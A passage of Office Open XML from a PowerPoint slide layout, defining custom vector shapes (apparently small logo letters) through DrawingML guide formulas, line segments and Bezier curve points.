                        <a:pt x="0" y="7"/>
                        <a:pt x="0" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="5"/>
                        <a:pt x="0" y="4"/>
                        <a:pt x="1" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="2"/>
                        <a:pt x="2" y="1"/>
                        <a:pt x="3" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="0"/>
                        <a:pt x="4" y="0"/>
                        <a:pt x="5" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="0"/>
                        <a:pt x="7" y="0"/>
                        <a:pt x="8" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="1"/>
                        <a:pt x="10" y="2"/>
                        <a:pt x="10" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="4"/>
                        <a:pt x="11" y="5"/>
                        <a:pt x="11" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="6"/>
                        <a:pt x="11" y="7"/>
                        <a:pt x="11" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="9"/>
                        <a:pt x="10" y="10"/>
                        <a:pt x="9" y="11"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3" y="19"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="5" y="10"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="10"/>
                        <a:pt x="7" y="9"/>
                        <a:pt x="8" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="8"/>
                        <a:pt x="9" y="7"/>
                        <a:pt x="9" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="5"/>
                        <a:pt x="9" y="4"/>
                        <a:pt x="8" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="2"/>
                        <a:pt x="6" y="2"/>
                        <a:pt x="5" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="2"/>
                        <a:pt x="3" y="2"/>
                        <a:pt x="3" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="4"/>
                        <a:pt x="2" y="5"/>
                        <a:pt x="2" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="7"/>
                        <a:pt x="2" y="8"/>
                        <a:pt x="3" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="9"/>
                        <a:pt x="4"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360"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9045575" y="4229101"/>
                  <a:ext cx="28575" cy="42863"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 9 w 13"/>
                    <a:gd name="T1" fmla="*/ 9 h 19"/>
                    <a:gd name="T2" fmla="*/ 12 w 13"/>
                    <a:gd name="T3" fmla="*/ 11 h 19"/>
                    <a:gd name="T4" fmla="*/ 13 w 13"/>
                    <a:gd name="T5" fmla="*/ 14 h 19"/>
                    <a:gd name="T6" fmla="*/ 11 w 13"/>
                    <a:gd name="T7" fmla="*/ 17 h 19"/>
                    <a:gd name="T8" fmla="*/ 6 w 13"/>
                    <a:gd name="T9" fmla="*/ 19 h 19"/>
                    <a:gd name="T10" fmla="*/ 2 w 13"/>
                    <a:gd name="T11" fmla="*/ 17 h 19"/>
                    <a:gd name="T12" fmla="*/ 0 w 13"/>
                    <a:gd name="T13" fmla="*/ 14 h 19"/>
                    <a:gd name="T14" fmla="*/ 1 w 13"/>
                    <a:gd name="T15" fmla="*/ 11 h 19"/>
                    <a:gd name="T16" fmla="*/ 4 w 13"/>
                    <a:gd name="T17" fmla="*/ 9 h 19"/>
                    <a:gd name="T18" fmla="*/ 2 w 13"/>
                    <a:gd name="T19" fmla="*/ 7 h 19"/>
                    <a:gd name="T20" fmla="*/ 1 w 13"/>
                    <a:gd name="T21" fmla="*/ 5 h 19"/>
                    <a:gd name="T22" fmla="*/ 2 w 13"/>
                    <a:gd name="T23" fmla="*/ 3 h 19"/>
                    <a:gd name="T24" fmla="*/ 4 w 13"/>
                    <a:gd name="T25" fmla="*/ 1 h 19"/>
                    <a:gd name="T26" fmla="*/ 7 w 13"/>
                    <a:gd name="T27" fmla="*/ 0 h 19"/>
                    <a:gd name="T28" fmla="*/ 9 w 13"/>
                    <a:gd name="T29" fmla="*/ 1 h 19"/>
                    <a:gd name="T30" fmla="*/ 11 w 13"/>
                    <a:gd name="T31" fmla="*/ 3 h 19"/>
                    <a:gd name="T32" fmla="*/ 12 w 13"/>
                    <a:gd name="T33" fmla="*/ 5 h 19"/>
                    <a:gd name="T34" fmla="*/ 11 w 13"/>
                    <a:gd name="T35" fmla="*/ 7 h 19"/>
                    <a:gd name="T36" fmla="*/ 9 w 13"/>
                    <a:gd name="T37" fmla="*/ 9 h 19"/>
                    <a:gd name="T38" fmla="*/ 7 w 13"/>
                    <a:gd name="T39" fmla="*/ 10 h 19"/>
                    <a:gd name="T40" fmla="*/ 3 w 13"/>
                    <a:gd name="T41" fmla="*/ 11 h 19"/>
                    <a:gd name="T42" fmla="*/ 2 w 13"/>
                    <a:gd name="T43" fmla="*/ 14 h 19"/>
                    <a:gd name="T44" fmla="*/ 3 w 13"/>
                    <a:gd name="T45" fmla="*/ 16 h 19"/>
                    <a:gd name="T46" fmla="*/ 4 w 13"/>
                    <a:gd name="T47" fmla="*/ 17 h 19"/>
                    <a:gd name="T48" fmla="*/ 6 w 13"/>
                    <a:gd name="T49" fmla="*/ 17 h 19"/>
                    <a:gd name="T50" fmla="*/ 10 w 13"/>
                    <a:gd name="T51" fmla="*/ 16 h 19"/>
                    <a:gd name="T52" fmla="*/ 11 w 13"/>
                    <a:gd name="T53" fmla="*/ 14 h 19"/>
                    <a:gd name="T54" fmla="*/ 9 w 13"/>
                    <a:gd name="T55" fmla="*/ 11 h 19"/>
                    <a:gd name="T56" fmla="*/ 7 w 13"/>
                    <a:gd name="T57" fmla="*/ 10 h 19"/>
                    <a:gd name="T58" fmla="*/ 6 w 13"/>
                    <a:gd name="T59" fmla="*/ 2 h 19"/>
                    <a:gd name="T60" fmla="*/ 4 w 13"/>
                    <a:gd name="T61" fmla="*/ 3 h 19"/>
                    <a:gd name="T62" fmla="*/ 3 w 13"/>
                    <a:gd name="T63" fmla="*/ 5 h 19"/>
                    <a:gd name="T64" fmla="*/ 4 w 13"/>
                    <a:gd name="T65" fmla="*/ 7 h 19"/>
                    <a:gd name="T66" fmla="*/ 7 w 13"/>
                    <a:gd name="T67" fmla="*/ 8 h 19"/>
                    <a:gd name="T68" fmla="*/ 8 w 13"/>
                    <a:gd name="T69" fmla="*/ 8 h 19"/>
                    <a:gd name="T70" fmla="*/ 9 w 13"/>
                    <a:gd name="T71" fmla="*/ 6 h 19"/>
                    <a:gd name="T72" fmla="*/ 10 w 13"/>
                    <a:gd name="T73" fmla="*/ 5 h 19"/>
                    <a:gd name="T74" fmla="*/ 9 w 13"/>
                    <a:gd name="T75" fmla="*/ 3 h 19"/>
                    <a:gd name="T76" fmla="*/ 6 w 13"/>
                    <a:gd name="T7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 h="19">
                      <a:moveTo>
                        <a:pt x="9" y="9"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="9"/>
                        <a:pt x="11" y="10"/>
                        <a:pt x="12" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="12"/>
                        <a:pt x="13" y="13"/>
                        <a:pt x="13" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="15"/>
                        <a:pt x="12" y="16"/>
                        <a:pt x="11" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="18"/>
                        <a:pt x="8" y="19"/>
                        <a:pt x="6" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="19"/>
                        <a:pt x="3" y="19"/>
                        <a:pt x="2" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="16"/>
                        <a:pt x="0" y="15"/>
                        <a:pt x="0" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="13"/>
                        <a:pt x="1" y="12"/>
                        <a:pt x="1" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="10"/>
                        <a:pt x="3" y="9"/>
                        <a:pt x="4" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="8"/>
                        <a:pt x="2" y="8"/>
                        <a:pt x="2" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="6"/>
                        <a:pt x="1" y="6"/>
                        <a:pt x="1" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="4"/>
                        <a:pt x="1" y="3"/>
                        <a:pt x="2" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="2"/>
                        <a:pt x="3" y="1"/>
                        <a:pt x="4" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="0"/>
                        <a:pt x="6" y="0"/>
                        <a:pt x="7" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="0"/>
                        <a:pt x="8" y="0"/>
                        <a:pt x="9" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="1"/>
                        <a:pt x="11" y="2"/>
                        <a:pt x="11" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="3"/>
                        <a:pt x="12" y="4"/>
                        <a:pt x="12" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="6"/>
                        <a:pt x="11" y="7"/>
                        <a:pt x="11" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="8"/>
                        <a:pt x="10" y="8"/>
                        <a:pt x="9" y="9"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="7" y="10"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="10"/>
                        <a:pt x="4" y="10"/>
                        <a:pt x="3" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="12"/>
                        <a:pt x="2" y="13"/>
                        <a:pt x="2" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="14"/>
                        <a:pt x="2" y="15"/>
                        <a:pt x="3" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="16"/>
                        <a:pt x="4" y="17"/>
                        <a:pt x="4" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="17"/>
                        <a:pt x="6" y="17"/>
                        <a:pt x="6" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="17"/>
                        <a:pt x="9" y="17"/>
                        <a:pt x="10" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="15"/>
                        <a:pt x="11" y="15"/>
                        <a:pt x="11" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="13"/>
                        <a:pt x="10" y="12"/>
                        <a:pt x="9" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="10"/>
                        <a:pt x="8" y="10"/>
                        <a:pt x="7" y="10"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="6" y="2"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="2"/>
                        <a:pt x="5" y="2"/>
                        <a:pt x="4" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="3"/>
                        <a:pt x="3" y="4"/>
                        <a:pt x="3" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="6"/>
                        <a:pt x="3" y="6"/>
                        <a:pt x="4" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="8"/>
                        <a:pt x="6" y="8"/>
                        <a:pt x="7" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="8"/>
                        <a:pt x="8" y="8"/>
                        <a:pt x="8" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="7"/>
                        <a:pt x="9" y="7"/>
                        <a:pt x="9" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="6"/>
                        <a:pt x="10" y="5"/>
                        <a:pt x="10" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="4"/>
                        <a:pt x="10" y="4"/>
                        <a:pt x="9" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="2"/>
                        <a:pt x="8" y="2"/>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361"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9083675" y="4230688"/>
                  <a:ext cx="12700" cy="41275"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 2 w 8"/>
                    <a:gd name="T1" fmla="*/ 0 h 26"/>
                    <a:gd name="T2" fmla="*/ 8 w 8"/>
                    <a:gd name="T3" fmla="*/ 0 h 26"/>
                    <a:gd name="T4" fmla="*/ 8 w 8"/>
                    <a:gd name="T5" fmla="*/ 26 h 26"/>
                    <a:gd name="T6" fmla="*/ 5 w 8"/>
                    <a:gd name="T7" fmla="*/ 26 h 26"/>
                    <a:gd name="T8" fmla="*/ 5 w 8"/>
                    <a:gd name="T9" fmla="*/ 2 h 26"/>
                    <a:gd name="T10" fmla="*/ 0 w 8"/>
                    <a:gd name="T11" fmla="*/ 2 h 26"/>
                    <a:gd name="T12" fmla="*/ 2 w 8"/>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8" h="26">
                      <a:moveTo>
                        <a:pt x="2" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="8" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="2"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0"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362"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9109075" y="4240213"/>
                  <a:ext cx="28575" cy="31750"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 18"/>
                    <a:gd name="T1" fmla="*/ 0 h 20"/>
                    <a:gd name="T2" fmla="*/ 3 w 18"/>
                    <a:gd name="T3" fmla="*/ 0 h 20"/>
                    <a:gd name="T4" fmla="*/ 9 w 18"/>
                    <a:gd name="T5" fmla="*/ 15 h 20"/>
                    <a:gd name="T6" fmla="*/ 16 w 18"/>
                    <a:gd name="T7" fmla="*/ 0 h 20"/>
                    <a:gd name="T8" fmla="*/ 18 w 18"/>
                    <a:gd name="T9" fmla="*/ 0 h 20"/>
                    <a:gd name="T10" fmla="*/ 9 w 18"/>
                    <a:gd name="T11" fmla="*/ 20 h 20"/>
                    <a:gd name="T12" fmla="*/ 9 w 18"/>
                    <a:gd name="T13" fmla="*/ 20 h 20"/>
                    <a:gd name="T14" fmla="*/ 0 w 1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20">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="3" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9" y="15"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="16" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="18" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9" y="20"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9" y="2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363"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8640763" y="3994151"/>
                  <a:ext cx="14288" cy="146050"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 4 w 6"/>
                    <a:gd name="T1" fmla="*/ 0 h 63"/>
                    <a:gd name="T2" fmla="*/ 6 w 6"/>
                    <a:gd name="T3" fmla="*/ 2 h 63"/>
                    <a:gd name="T4" fmla="*/ 6 w 6"/>
                    <a:gd name="T5" fmla="*/ 63 h 63"/>
                    <a:gd name="T6" fmla="*/ 2 w 6"/>
                    <a:gd name="T7" fmla="*/ 63 h 63"/>
                    <a:gd name="T8" fmla="*/ 0 w 6"/>
                    <a:gd name="T9" fmla="*/ 62 h 63"/>
                    <a:gd name="T10" fmla="*/ 0 w 6"/>
                    <a:gd name="T11" fmla="*/ 0 h 63"/>
                    <a:gd name="T12" fmla="*/ 4 w 6"/>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6" h="63">
                      <a:moveTo>
                        <a:pt x="4" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="0"/>
                        <a:pt x="6" y="1"/>
                        <a:pt x="6" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="63"/>
                        <a:pt x="6" y="63"/>
                        <a:pt x="6" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="63"/>
                        <a:pt x="2" y="63"/>
                        <a:pt x="2" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="63"/>
                        <a:pt x="0" y="62"/>
                        <a:pt x="0" y="62"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="0"/>
                        <a:pt x="0" y="0"/>
                        <a:pt x="0" y="0"/>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364"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8715375" y="3994151"/>
                  <a:ext cx="46038" cy="146050"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 12 w 20"/>
                    <a:gd name="T1" fmla="*/ 0 h 63"/>
                    <a:gd name="T2" fmla="*/ 20 w 20"/>
                    <a:gd name="T3" fmla="*/ 8 h 63"/>
                    <a:gd name="T4" fmla="*/ 20 w 20"/>
                    <a:gd name="T5" fmla="*/ 55 h 63"/>
                    <a:gd name="T6" fmla="*/ 12 w 20"/>
                    <a:gd name="T7" fmla="*/ 63 h 63"/>
                    <a:gd name="T8" fmla="*/ 0 w 20"/>
                    <a:gd name="T9" fmla="*/ 63 h 63"/>
                    <a:gd name="T10" fmla="*/ 0 w 20"/>
                    <a:gd name="T11" fmla="*/ 0 h 63"/>
                    <a:gd name="T12" fmla="*/ 12 w 20"/>
                    <a:gd name="T13" fmla="*/ 0 h 63"/>
                    <a:gd name="T14" fmla="*/ 14 w 20"/>
                    <a:gd name="T15" fmla="*/ 9 h 63"/>
                    <a:gd name="T16" fmla="*/ 10 w 20"/>
                    <a:gd name="T17" fmla="*/ 6 h 63"/>
                    <a:gd name="T18" fmla="*/ 6 w 20"/>
                    <a:gd name="T19" fmla="*/ 6 h 63"/>
                    <a:gd name="T20" fmla="*/ 6 w 20"/>
                    <a:gd name="T21" fmla="*/ 57 h 63"/>
                    <a:gd name="T22" fmla="*/ 10 w 20"/>
                    <a:gd name="T23" fmla="*/ 57 h 63"/>
                    <a:gd name="T24" fmla="*/ 14 w 20"/>
                    <a:gd name="T25" fmla="*/ 53 h 63"/>
                    <a:gd name="T26" fmla="*/ 14 w 20"/>
                    <a:gd name="T27"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63">
                      <a:moveTo>
                        <a:pt x="12" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="0"/>
                        <a:pt x="20" y="3"/>
                        <a:pt x="20" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="55"/>
                        <a:pt x="20" y="55"/>
                        <a:pt x="20" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="60"/>
                        <a:pt x="17" y="63"/>
                        <a:pt x="12" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="63"/>
                        <a:pt x="0" y="63"/>
                        <a:pt x="0" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="0"/>
                        <a:pt x="0" y="0"/>
                        <a:pt x="0" y="0"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="12" y="0"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="14" y="9"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="7"/>
                        <a:pt x="12" y="6"/>
                        <a:pt x="10" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="6"/>
                        <a:pt x="6" y="6"/>
                        <a:pt x="6" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="57"/>
                        <a:pt x="6" y="57"/>
                        <a:pt x="6" y="57"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="57"/>
                        <a:pt x="10" y="57"/>
                        <a:pt x="10" y="57"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="57"/>
                        <a:pt x="14" y="56"/>
                        <a:pt x="14" y="53"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="14"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365"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8821738" y="3994151"/>
                  <a:ext cx="46038" cy="146050"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 20 w 20"/>
                    <a:gd name="T1" fmla="*/ 57 h 63"/>
                    <a:gd name="T2" fmla="*/ 18 w 20"/>
                    <a:gd name="T3" fmla="*/ 61 h 63"/>
                    <a:gd name="T4" fmla="*/ 15 w 20"/>
                    <a:gd name="T5" fmla="*/ 63 h 63"/>
                    <a:gd name="T6" fmla="*/ 0 w 20"/>
                    <a:gd name="T7" fmla="*/ 63 h 63"/>
                    <a:gd name="T8" fmla="*/ 0 w 20"/>
                    <a:gd name="T9" fmla="*/ 1 h 63"/>
                    <a:gd name="T10" fmla="*/ 2 w 20"/>
                    <a:gd name="T11" fmla="*/ 0 h 63"/>
                    <a:gd name="T12" fmla="*/ 19 w 20"/>
                    <a:gd name="T13" fmla="*/ 0 h 63"/>
                    <a:gd name="T14" fmla="*/ 17 w 20"/>
                    <a:gd name="T15" fmla="*/ 4 h 63"/>
                    <a:gd name="T16" fmla="*/ 14 w 20"/>
                    <a:gd name="T17" fmla="*/ 6 h 63"/>
                    <a:gd name="T18" fmla="*/ 8 w 20"/>
                    <a:gd name="T19" fmla="*/ 6 h 63"/>
                    <a:gd name="T20" fmla="*/ 7 w 20"/>
                    <a:gd name="T21" fmla="*/ 8 h 63"/>
                    <a:gd name="T22" fmla="*/ 7 w 20"/>
                    <a:gd name="T23" fmla="*/ 27 h 63"/>
                    <a:gd name="T24" fmla="*/ 16 w 20"/>
                    <a:gd name="T25" fmla="*/ 27 h 63"/>
                    <a:gd name="T26" fmla="*/ 14 w 20"/>
                    <a:gd name="T27" fmla="*/ 31 h 63"/>
                    <a:gd name="T28" fmla="*/ 11 w 20"/>
                    <a:gd name="T29" fmla="*/ 33 h 63"/>
                    <a:gd name="T30" fmla="*/ 8 w 20"/>
                    <a:gd name="T31" fmla="*/ 33 h 63"/>
                    <a:gd name="T32" fmla="*/ 7 w 20"/>
                    <a:gd name="T33" fmla="*/ 35 h 63"/>
                    <a:gd name="T34" fmla="*/ 7 w 20"/>
                    <a:gd name="T35" fmla="*/ 57 h 63"/>
                    <a:gd name="T36" fmla="*/ 20 w 20"/>
                    <a:gd name="T37" fmla="*/ 5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63">
                      <a:moveTo>
                        <a:pt x="20" y="57"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="58"/>
                        <a:pt x="18" y="61"/>
                        <a:pt x="18" y="61"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="62"/>
                        <a:pt x="17" y="63"/>
                        <a:pt x="15" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="63"/>
                        <a:pt x="0" y="63"/>
                        <a:pt x="0" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="1"/>
                        <a:pt x="0" y="1"/>
                        <a:pt x="0" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="0"/>
                        <a:pt x="1" y="0"/>
                        <a:pt x="2" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="0"/>
                        <a:pt x="19" y="0"/>
                        <a:pt x="19" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="4"/>
                        <a:pt x="17" y="4"/>
                        <a:pt x="17" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="5"/>
                        <a:pt x="16" y="6"/>
                        <a:pt x="14" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="6"/>
                        <a:pt x="8" y="6"/>
                        <a:pt x="8" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="6"/>
                        <a:pt x="7" y="7"/>
                        <a:pt x="7" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="27"/>
                        <a:pt x="7" y="27"/>
                        <a:pt x="7" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="27"/>
                        <a:pt x="16" y="27"/>
                        <a:pt x="16" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="28"/>
                        <a:pt x="15" y="31"/>
                        <a:pt x="14" y="31"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="32"/>
                        <a:pt x="13" y="33"/>
                        <a:pt x="11" y="33"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="33"/>
                        <a:pt x="8" y="33"/>
                        <a:pt x="8" y="33"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="33"/>
                        <a:pt x="7" y="34"/>
                        <a:pt x="7" y="35"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="57"/>
                        <a:pt x="7" y="57"/>
                        <a:pt x="7" y="57"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="2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366"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8915400" y="3994151"/>
                  <a:ext cx="46038" cy="146050"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 20 w 20"/>
                    <a:gd name="T1" fmla="*/ 63 h 63"/>
                    <a:gd name="T2" fmla="*/ 18 w 20"/>
                    <a:gd name="T3" fmla="*/ 63 h 63"/>
                    <a:gd name="T4" fmla="*/ 13 w 20"/>
                    <a:gd name="T5" fmla="*/ 59 h 63"/>
                    <a:gd name="T6" fmla="*/ 6 w 20"/>
                    <a:gd name="T7" fmla="*/ 28 h 63"/>
                    <a:gd name="T8" fmla="*/ 6 w 20"/>
                    <a:gd name="T9" fmla="*/ 63 h 63"/>
                    <a:gd name="T10" fmla="*/ 0 w 20"/>
                    <a:gd name="T11" fmla="*/ 63 h 63"/>
                    <a:gd name="T12" fmla="*/ 0 w 20"/>
                    <a:gd name="T13" fmla="*/ 0 h 63"/>
                    <a:gd name="T14" fmla="*/ 3 w 20"/>
                    <a:gd name="T15" fmla="*/ 0 h 63"/>
                    <a:gd name="T16" fmla="*/ 7 w 20"/>
